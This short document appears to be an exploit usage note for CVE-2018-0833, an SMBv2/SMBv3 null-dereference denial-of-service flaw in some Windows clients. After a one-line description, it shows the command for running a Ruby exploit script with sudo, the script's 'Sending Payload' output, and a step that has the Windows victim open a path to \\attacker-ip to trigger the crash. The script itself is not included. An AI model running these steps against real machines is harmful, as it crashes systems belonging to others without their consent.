The Microsoft Server Message Block 2.0 and 3.0 (SMBv2/SMBv3) client in Windows 8.1 and RT 8.1 and Windows Server 2012 R2 allows a denial of service vulnerability due to how specially crafted requests are handled, aka "SMBv2/SMBv3 Null Dereference Denial of Service Vulnerability".
Exploit
sudo ruby cve-2018-0833_exploit.rb
-> sudo ruby CVE-2018-0833.rb
[+] From: 192.168.100.21
[*] Sending Payload...
-> Now from Windows, go to the file explorer or from Run and type \\attacker-ip
